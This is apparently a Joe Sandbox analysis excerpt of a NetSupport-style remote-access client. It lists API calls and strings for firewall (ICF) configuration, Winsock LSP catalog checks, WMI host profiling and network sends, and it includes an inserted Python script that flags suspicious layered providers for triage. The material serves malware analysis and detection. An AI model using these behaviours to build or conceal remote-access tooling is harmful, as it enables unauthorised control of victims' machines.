                                                                                      • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 110150CA
                                                                                      • _memset.LIBCMT ref: 1101510E
                                                                                      • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                      Strings
                                                                                      • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                      • %012d, xrefs: 110150C4
                                                                                      • PackedCatalogItem, xrefs: 11015132
                                                                                      • NSLSP, xrefs: 11015158
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValue_memsetwsprintf
                                                                                      • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                      • API String ID: 1333399081-1346142259
                                                                                      • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                      • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                      • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                      • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
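The function above walks the Winsock provider catalog: it formats each subkey name with wsprintfA("%012d"), reads that entry's PackedCatalogItem value and, per the strings, compares against NSLSP, which is consistent with the client checking for its own Layered Service Provider. The Python script below is an added example written for this report, not code from the sample or from NetSupport. It parses constructed PackedCatalogItem blobs offline and, on a Windows host, can read the live catalog through winreg. Assumed and not stated in the report: the value layout (a 260-byte ANSI DLL path followed by a WSAPROTOCOL_INFOA structure, with ChainLen 0 marking a layered provider), the field offsets used, the helper names and every sample path.

```python
"""Offline parser for Winsock2 Protocol_Catalog9 entries (added example, not sample code).

Assumed PackedCatalogItem layout: bytes[0:260] hold the provider DLL path as a
NUL-terminated ANSI string (MAX_PATH), followed by a WSAPROTOCOL_INFOA structure
(372 bytes) in which dwCatalogEntryId sits at struct offset 36,
ProtocolChain.ChainLen at 40 and szProtocol[256] at 116. ChainLen == 0 marks a
layered provider (an LSP). All sample data below is constructed.
"""
import os
import struct

MAX_PATH = 260
WSAPROTOCOL_INFOA_SIZE = 372
CATALOG_KEY = (r"SYSTEM\CurrentControlSet\Services\WinSock2\Parameters"
               r"\Protocol_Catalog9\Catalog_Entries")


def entry_name(index):
    """Subkey name built the same way as the wsprintfA("%012d") call in the listing."""
    return "%012d" % index


def parse_packed_catalog_item(blob):
    """Return (dll_path, catalog_entry_id, chain_len, protocol_name) for one value."""
    if len(blob) < MAX_PATH + WSAPROTOCOL_INFOA_SIZE:
        raise ValueError("PackedCatalogItem too short: %d bytes" % len(blob))
    codec = "mbcs" if os.name == "nt" else "latin-1"
    dll_path = blob[:MAX_PATH].split(b"\0", 1)[0].decode(codec)
    info = blob[MAX_PATH:MAX_PATH + WSAPROTOCOL_INFOA_SIZE]
    catalog_entry_id, chain_len = struct.unpack_from("<II", info, 36)
    protocol_name = info[116:116 + 256].split(b"\0", 1)[0].decode(codec)
    return dll_path, catalog_entry_id, chain_len, protocol_name


def build_packed_item(dll_path, catalog_entry_id, chain_len, protocol_name):
    """Construct a PackedCatalogItem blob in the assumed layout (test data only)."""
    info = bytearray(WSAPROTOCOL_INFOA_SIZE)
    struct.pack_into("<II", info, 36, catalog_entry_id, chain_len)
    name = protocol_name.encode("latin-1")[:255]
    info[116:116 + len(name)] = name
    path = dll_path.encode("latin-1")[:MAX_PATH - 1]
    return path.ljust(MAX_PATH, b"\0") + bytes(info)


def suspicious_providers(catalog):
    """Flag entries whose DLL path names the NSLSP module (the string the client
    compares against) or that are layered providers loaded from outside System32."""
    hits = []
    for name in sorted(catalog):
        dll_path, entry_id, chain_len, proto = parse_packed_catalog_item(catalog[name])
        lowered = dll_path.lower()
        in_system32 = (lowered.startswith("%systemroot%\\system32\\")
                       or "\\windows\\system32\\" in lowered)
        if "nslsp" in lowered or (chain_len == 0 and not in_system32):
            hits.append((name, dll_path, entry_id, chain_len, proto))
    return hits


def load_catalog_from_registry():
    """Windows only: walk %012d subkeys from 1 until one is missing, as the client does."""
    import winreg
    catalog = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, CATALOG_KEY) as root:
        index = 1
        while True:
            name = entry_name(index)
            try:
                with winreg.OpenKey(root, name) as sub:
                    catalog[name], _ = winreg.QueryValueEx(sub, "PackedCatalogItem")
            except OSError:
                break
            index += 1
    return catalog


# Constructed catalog: two stock Microsoft base providers, a layered NetSupport-style
# provider and a protocol chain that routes TCP through it. Paths are illustrative only.
SAMPLE_CATALOG = {
    entry_name(1): build_packed_item(r"%SystemRoot%\system32\mswsock.dll", 1001, 1,
                                     "MSAFD Tcpip [TCP/IP]"),
    entry_name(2): build_packed_item(r"%SystemRoot%\system32\mswsock.dll", 1002, 1,
                                     "MSAFD Tcpip [UDP/IP]"),
    entry_name(3): build_packed_item(r"C:\ProgramData\Example\NSLSP.dll", 1003, 0,
                                     "NetSupport LSP"),
    entry_name(4): build_packed_item(r"C:\ProgramData\Example\NSLSP.dll", 1004, 2,
                                     "MSAFD Tcpip [TCP/IP] over NetSupport LSP"),
}

if __name__ == "__main__":
    catalog = load_catalog_from_registry() if os.name == "nt" else SAMPLE_CATALOG
    for name, dll_path, entry_id, chain_len, proto in suspicious_providers(catalog):
        print("%s id=%d chainlen=%d %s -> %s" % (name, entry_id, chain_len, proto, dll_path))
```

On a live host the catalog lives under HKLM and is readable without elevation; base providers (ChainLen 1) are normally mswsock.dll, so any layered entry pointing outside System32, or a protocol chain built over one, is worth pulling and hashing during triage.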
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                      • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                      • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                      • String ID: bad cast
                                                                                      • API String ID: 2427920155-3145022300
                                                                                      • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                      • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                      • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                      • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 6C5E6950
                                                                                        • Part of subcall function 6C5E7BE0: _memset.LIBCMT ref: 6C5E7BFF
                                                                                        • Part of subcall function 6C5E7BE0: _strncpy.LIBCMT ref: 6C5E7C0B
                                                                                        • Part of subcall function 6C5DA4E0: EnterCriticalSection.KERNEL32(6C61B898,00000000,?,?,?,6C5DDA7F,?,00000000), ref: 6C5DA503
                                                                                        • Part of subcall function 6C5DA4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6C5DA568
                                                                                        • Part of subcall function 6C5DA4E0: Sleep.KERNEL32(00000000,?,6C5DDA7F,?,00000000), ref: 6C5DA581
                                                                                        • Part of subcall function 6C5DA4E0: LeaveCriticalSection.KERNEL32(6C61B898,00000000), ref: 6C5DA5B3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmp
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                      • String ID: 1.2$Bl^l$Channel$Client$Publish %d pending services
                                                                                      • API String ID: 1112461860-3724619051
                                                                                      • Opcode ID: b3781626d08bba0d0c1be4c731d31220b6d7aea3d102f15218fa38e7e9c4e79a
                                                                                      • Instruction ID: d7257693362b3b5800c530b124fa5055513c9b1dcfaaf5649dd297b53f66769a
                                                                                      • Opcode Fuzzy Hash: b3781626d08bba0d0c1be4c731d31220b6d7aea3d102f15218fa38e7e9c4e79a
                                                                                      • Instruction Fuzzy Hash: 3551E671B04309DBDB10EA7EDC9679D37B4AB4938AF14053AC952C3E81DF30A944CB59
                                                                                      APIs
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                      • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                      • API String ID: 3494822531-1878648853
                                                                                      • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                      • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                      • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                      • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                      APIs
                                                                                        • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                      • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                      • std::exception::exception.LIBCMT ref: 11107414
                                                                                      • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                      • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                      • API String ID: 2851125068-2390547818
                                                                                      • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                      • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                      • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                      • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(00000300,000000FF), ref: 1101733C
                                                                                      • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                      • CoUninitialize.COMBASE ref: 110173D0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                      • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                      • API String ID: 2407233060-578995875
                                                                                      • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                      • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                      • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                      • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(00000300,000000FF), ref: 11017252
                                                                                      • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                      • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                      • CoUninitialize.COMBASE ref: 110172E0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                      • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                      • API String ID: 2407233060-2037925671
                                                                                      • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                      • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                      • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                      • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                      APIs
                                                                                      Strings
                                                                                      • DoICFConfig() OK, xrefs: 11138786
                                                                                      • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                      • AutoICFConfig, xrefs: 11138700
                                                                                      • Client, xrefs: 11138705
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4162903482.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4162887009.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163110629.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163128229.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountTick
                                                                                      • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                      • API String ID: 536389180-1512301160
                                                                                      • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                      • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                      • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                      • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                      APIs
                                                                                      • send.WSOCK32(?,?,?,00000000), ref: 6C5D9C93
                                                                                      • timeGetTime.WINMM(?,?,?,00000000), ref: 6C5D9CD0
                                                                                      • Sleep.KERNEL32(00000000), ref: 6C5D9CDE
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C5D9D4F
                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 6C5D9D72
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.4163444203.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                      • Associated: 00000005.00000002.4163419396.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163517187.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163540005.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.4163584177.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_6c5d0000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                      • String ID: 3'
                                                                                      • API String ID: 77915721-280543908
                                                                                      • Opcode ID: 4d991a7fd4910dd5e63054c69c344b3b143660256b87d5feb900cda10d859242
                                                                                      • Instruction ID: e4615c7a9f2bfe3b499a5afee83e88e60d15619c19cca24c9eeb59424fce252b
                                                                                      • Opcode Fuzzy Hash: 4d991a7fd4910dd5e63054c69c344b3b143660256b87d5feb900cda10d859242
                                                                                      • Instruction Fuzzy Hash: 4D21CD70A042188FDB20DF68DC98B9AB3B4AF45325F164295D80E9B681CA30ED84CF95
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                      • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
